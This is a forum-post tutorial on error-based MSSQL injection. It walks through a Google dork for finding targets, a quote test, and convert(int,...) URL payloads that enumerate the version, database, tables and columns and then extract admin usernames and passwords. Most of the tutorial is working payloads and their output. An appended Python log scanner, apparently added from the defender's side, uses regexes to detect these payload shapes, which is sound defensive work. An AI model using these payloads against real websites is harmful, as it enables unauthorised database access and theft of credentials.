MsSQL Injection Tutorial 10-03-2012, 01:00 PM
Intro
Hi all on Anarchy Forum,
Today I will be showing you how to do MsSQLi. There are 2 types that I know of for exploiting a MsSQL database.
1. GROUPING ( it's very ineffective and I'm not explaining it in this tut )
and
2. CONVERSION ( i will show it in this tut ).
Finding vulnerable site
For finding a vulnerable site you can use Google dorks,
for example:
Code:
inurl:index.aspx?id=
When you find your site you can check if it's vulnerable by adding ' at the end of the URL ( just like normal SQLi ).
So our URL will look like this:
Code:
www.site.com/index.aspx?id=5'
If you get an error like this:
Code:
Microsoft OLE DB Provider for SQL Server error
Incorrect Syntax
Finding Tables and Columns with CONVERSION
Before we continue, use Notepad to write down the tables and columns, you will need them.
So let's continue.
-Finding the version
For version our syntax will look like this:
Code:
www.site.com/index.aspx?id=5' and 1=convert(int,@@version)--
And our site outputs an error ( this is just an example )
Code:
Microsoft OLE DB PROVIDER for sql server error... conversion failed when converting the nverchar value '5.02.00' to data type int. index.aspx on line ...
The version is 5.02.00
-Finding Database Name
Now just replace @@version with db_name()
Our URL will look like this:
Code:
www.site.com/index.aspx?id=5' and 1=convert(int,db_name())--
The page output
Code:
database18
Our database name is database18
-Finding database user
Now we need to find the user that is using that database.
The URL will look like this:
Code:
www.site.com/index.aspx?id=5' and 1=convert(int,user_name())--
The page output
Code:
crow3b
So the user is crow3b ( example )
Finding Tables
So when we have done everything from above it's time to find tables.
Our URL will be
Code:
www.site.com/index.aspx?id=5' and 1=convert(int,(select top 1 table_name from information_schema.tables))--
The page output
Code:
Microsoft OLE DB PROVIDER for sql server error... conversion failed when converting the nverchar value 'tbl_members' to data type int. index.aspx on line ...
Our first table is tbl_members
But we need to find admin or user table
So let's continue.
Our URL will look like this:
Code:
www.site.com/index.aspx?id=5' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_members')))--
The page outputs another table called tbl_font
But still no admin or users table
Let's continue our search.
Our URL will look like this
Code:
www.site.com/index.aspx?id=5' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_members','tbl_font')))--
Now the site outputs a table called tbl_admin.
Finally we got our wanted table.
Finding Columns
Now when you have found the table you want to extract, it's time to find columns.
Our URL will look like this
Code:
www.site.com/index.aspx?id=5' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_admin'))--
The page outputs a column named username.
So we look for more columns:
Code:
www.site.com/index.aspx?id=5' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_admin' and column_name not in ('username')))--
The page now outputs a column called password.
Extracting data from Columns
Now that we have found our columns let's extract the data from them.
Our URL looks like this
Code:
www.site.com/index.aspx?id=5' and 1=convert(int,(select top 1 username from tbl_admin))--
The page outputs a username called crow3b.
Now let's find the password for user crow3b.
Our URL will look like this
Code:
www.site.com/index.aspx?id=5' and 1=convert(int,(select top 1 password from tbl_admin))--
Now the page outputs a password called pr0fiters.
NOTE: AFTER EVERY SEARCH FOR TABLE OR COLUMN, USERNAME AND PASSWORD IF YOU GET A NORMAL PAGE IT MEANS THAT THERE IS NO MORE TABLES,COLUMNS,ETC
That's it guys, I hope this will be helpful and sorry for my bad English.
-crow
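The CONVERSION technique the post walks through leaves a very recognisable trail in web server logs: one parameter carries `convert(int, ...)` wrapped around `@@version`, `db_name()`, `user_name()` or a `select top 1 ... from information_schema...` subquery, the request ends in `--`, and the server answers with an error page (typically HTTP 500) instead of the normal page. The script below is an added example written from the defender's side, not code from the post or its author: it parses constructed access-log lines in Apache/IIS combined format, URL-decodes each query parameter (including double encoding), matches a small signature set built from the payload shapes shown above, grades each hit, and summarises per source address how many probing requests produced server errors. The log lines, the signature names and the severity rules are my assumptions.

```python
"""Flag conversion-based (error-based) MSSQL injection probes in access logs.

Added defensive example; the log lines below are constructed and the
signature set is an assumption built from the payload shapes in the post.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Ordered so that weak indicators come first and strong ones later.
SIGNATURES = {
    "quote_probe": re.compile(r"'"),                                  # lone ' test, weak on its own
    "convert_to_int": re.compile(r"convert\s*\(\s*int\b", re.I),      # convert(int, <string>) trick
    "sysinfo_func": re.compile(r"@@version|db_name\s*\(|user_name\s*\(", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "subquery_top1": re.compile(r"select\s+top\s+1\b", re.I),        # row-by-row enumeration
    "comment_terminator": re.compile(r"--\s*$"),                      # trailing T-SQL comment
}
STRONG = {"sysinfo_func", "schema_enum", "subquery_top1"}

# Combined log format: ip ident user [timestamp] "METHOD url PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# Constructed sample: one client replays the post's probes, another browses normally.
LOG_SAMPLE = [
    '203.0.113.7 - - [10/Mar/2012:13:00:01 +0000] "GET /index.aspx?id=5 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [10/Mar/2012:13:00:09 +0000] "GET /index.aspx?id=5%27 HTTP/1.1" 500 812',
    '203.0.113.7 - - [10/Mar/2012:13:00:15 +0000] "GET /index.aspx?id=5%27+and+1%3Dconvert(int,@@version)-- HTTP/1.1" 500 940',
    '203.0.113.7 - - [10/Mar/2012:13:00:31 +0000] "GET /index.aspx?id=5%27+and+1%3Dconvert(int,(select+top+1+table_name+from+information_schema.tables))-- HTTP/1.1" 500 951',
    '198.51.100.4 - - [10/Mar/2012:13:01:02 +0000] "GET /index.aspx?id=7&lang=en HTTP/1.1" 200 5140',
]


def decode_params(url):
    """Split the query string into (name, value) pairs; parse_qsl decodes %XX and '+'."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def classify_value(value):
    """Return the signature names matched in one parameter value.

    Decoding is repeated (bounded) so a double-encoded payload such as
    %2527 -> %27 -> ' is still inspected in its final form.
    """
    decoded = value
    for _ in range(3):
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def severity(hits):
    """Grade a hit list: convert(int, ...) combined with a data source is the real signal."""
    hits = set(hits)
    if "convert_to_int" in hits and hits & STRONG:
        return "high"
    if "convert_to_int" in hits or hits & STRONG:
        return "medium"
    return "low" if hits else "none"


def scan_log(lines):
    """Parse each log line and emit one finding per parameter that matches a signature."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        for param, value in decode_params(m["url"]):
            hits = classify_value(value)
            if hits:
                findings.append({
                    "ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                    "param": param, "hits": hits, "severity": severity(hits),
                    "payload": unquote_plus(value)[:80],
                })
    return findings


def summarize(findings):
    """Per source IP: number of suspicious requests, how many errored, worst severity seen."""
    rank = {"low": 1, "medium": 2, "high": 3}
    out = {}
    for f in findings:
        s = out.setdefault(f["ip"], {"requests": 0, "errors": 0, "max_severity": "low"})
        s["requests"] += 1
        if f["status"] >= 500:  # conversion errors surface as server errors
            s["errors"] += 1
        if rank[f["severity"]] > rank[s["max_severity"]]:
            s["max_severity"] = f["severity"]
    return out


if __name__ == "__main__":
    for f in scan_log(LOG_SAMPLE):
        print(f"{f['severity']:6} {f['ip']} {f['status']} {f['param']}={f['payload']!r} {f['hits']}")
    print(summarize(scan_log(LOG_SAMPLE)))
```

The grading deliberately treats a bare `'` as weak evidence, since apostrophes occur in legitimate input, and only raises a finding to high when `convert(int, ...)` is paired with a system function or `information_schema` subquery. Correlating with the 5xx status is what makes the summary useful: the post's own note that a normal page means "no more rows" translates, on the defender's side, into a burst of error responses from one address with monotonically changing `not in (...)` lists.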